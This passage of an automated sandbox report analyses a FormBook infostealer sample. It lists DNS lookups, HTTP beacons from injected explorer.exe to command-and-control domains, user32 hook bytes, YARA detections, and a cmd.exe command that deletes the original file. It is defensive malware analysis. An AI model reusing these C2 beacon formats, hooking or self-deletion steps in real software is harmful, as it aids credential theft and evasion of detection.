                                                          Sep 27, 2021 14:38:10.554481983 CEST8.8.8.8192.168.2.40x9a2fNo error (0)www.noseainsight.comnoseainsight.comCNAME (Canonical name)IN (0x0001)
                                                          Sep 27, 2021 14:38:10.554481983 CEST8.8.8.8192.168.2.40x9a2fNo error (0)noseainsight.com34.102.136.180A (IP address)IN (0x0001)
                                                          Sep 27, 2021 14:38:33.026504993 CEST8.8.8.8192.168.2.40xb0aeNo error (0)www.dorotajedrusik.comwww39.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                          Sep 27, 2021 14:38:33.026504993 CEST8.8.8.8192.168.2.40xb0aeNo error (0)www39.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                          Sep 27, 2021 14:38:33.026504993 CEST8.8.8.8192.168.2.40xb0aeNo error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                          Sep 27, 2021 14:38:33.026504993 CEST8.8.8.8192.168.2.40xb0aeNo error (0)5f36b111-balancer.wixdns.nettd-balancer-euw2-6-109.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                          Sep 27, 2021 14:38:33.026504993 CEST8.8.8.8192.168.2.40xb0aeNo error (0)td-balancer-euw2-6-109.wixdns.net35.246.6.109A (IP address)IN (0x0001)
                                                          Sep 27, 2021 14:38:53.792260885 CEST8.8.8.8192.168.2.40x3b62No error (0)www.healthyweathorganics.com47.91.170.222A (IP address)IN (0x0001)

                                                          HTTP Request Dependency Graph

                                                          • www.noseainsight.com
                                                          • www.dorotajedrusik.com

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.44982134.102.136.18080C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Sep 27, 2021 14:38:10.579485893 CEST7759OUTGET /cmsr/?jtxXAR=f6Ad&4h0XO=aWr8NZzAm1//W065YDaH8MvMe5V7nlKazoNvd1fDio5dOX3Vx686XIFmrsqZJNrwHW47 HTTP/1.1
                                                          Host: www.noseainsight.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Sep 27, 2021 14:38:10.694045067 CEST7760INHTTP/1.1 403 Forbidden
                                                          Server: openresty
                                                          Date: Mon, 27 Sep 2021 12:38:10 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 275
                                                          ETag: "6139ed55-113"
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.44982235.246.6.10980C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Sep 27, 2021 14:38:33.068380117 CEST7762OUTGET /cmsr/?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR/3kPtojHfoDwxQoDiPWi0/zmWdCsSN34zRZDM7Yr&jtxXAR=f6Ad HTTP/1.1
                                                          Host: www.dorotajedrusik.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Sep 27, 2021 14:38:33.161304951 CEST7763INHTTP/1.1 301 Moved Permanently
                                                          Date: Mon, 27 Sep 2021 12:38:33 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          location: https://www.dorotajedrusik.com/cmsr?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR%2F3kPtojHfoDwxQoDiPWi0%2FzmWdCsSN34zRZDM7Yr&jtxXAR=f6Ad
                                                          strict-transport-security: max-age=120
                                                          x-wix-request-id: 1632746313.084195257051119681
                                                          Age: 0
                                                          Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                          X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVg06c/s992xw2H1Lb8Cr0s7,qquldgcFrj2n046g4RNSVIYbithkq29Tk42QMl6f1yxYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRalikT1tdHuwj9E+rXAjW8B/P35A2sqaSJufFReCt4dMF+3fKEXQvQlSAkB/lstal9R2CG0kkNBHquE4+qMuMAjUE=,2UNV7KOq4oGjA5+PKsX47LzXc1eZTFhpHbyqmhw2pKBYgeUJqUXtid+86vZww+nL,YO37Gu9ywAGROWP0rn2IfgW5PRv7IKD225xALAZbAmk=,LXlT8qjS5x6WBejJA3+gBWZqev46kXM4E2cIaE690MeTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,UvY1uiXtmgas6aI2l+unv4V+sXmuE8NPLw49WzYM4E1NJqc9MWi42+zQj+YE0ChkSYblWJ1+I4NCiXX+q5JMPA==
                                                          Cache-Control: no-cache
                                                          X-Content-Type-Options: nosniff
                                                          Server: Pepyaka/1.19.10


                                                          Code Manipulations

                                                          User Modules

                                                          Hook Summary

                                                          Function NameHook TypeActive in Processes
                                                          PeekMessageAINLINEexplorer.exe
                                                          PeekMessageWINLINEexplorer.exe
                                                          GetMessageWINLINEexplorer.exe
                                                          GetMessageAINLINEexplorer.exe

                                                          Processes

                                                          Process: explorer.exe, Module: user32.dll
                                                          Function NameHook TypeNew Data
                                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEF
                                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEF
                                                          GetMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEF
                                                          GetMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEF

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          Analysis Process: z7d1ehQQQW.exe PID: 984 Parent PID: 1572

                                                          General

                                                          Start time:14:36:44
                                                          Start date:27/09/2021
                                                          Path:C:\Users\user\Desktop\z7d1ehQQQW.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\Desktop\z7d1ehQQQW.exe'
                                                          Imagebase:0x860000
                                                          File size:685568 bytes
                                                          MD5 hash:50568FB6133EE4ED721EE46A3C0A9E98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          Analysis Process: z7d1ehQQQW.exe PID: 5800 Parent PID: 984

                                                          General

                                                          Start time:14:36:55
                                                          Start date:27/09/2021
                                                          Path:C:\Users\user\Desktop\z7d1ehQQQW.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\z7d1ehQQQW.exe
                                                          Imagebase:0xe90000
                                                          File size:685568 bytes
                                                          MD5 hash:50568FB6133EE4ED721EE46A3C0A9E98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:low

                                                          Analysis Process: explorer.exe PID: 3424 Parent PID: 5800

                                                          General

                                                          Start time:14:36:57
                                                          Start date:27/09/2021
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff6fee60000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:high

                                                          Analysis Process: cscript.exe PID: 6944 Parent PID: 3424

                                                          General

                                                          Start time:14:37:21
                                                          Start date:27/09/2021
                                                          Path:C:\Windows\SysWOW64\cscript.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\cscript.exe
                                                          Imagebase:0x1c0000
                                                          File size:143360 bytes
                                                          MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:moderate

                                                          Analysis Process: cmd.exe PID: 6480 Parent PID: 6944

                                                          General

                                                          Start time:14:37:25
                                                          Start date:27/09/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:/c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe'
                                                          Imagebase:0x11d0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Analysis Process: conhost.exe PID: 5072 Parent PID: 6480

                                                          General

                                                          Start time:14:37:26
                                                          Start date:27/09/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >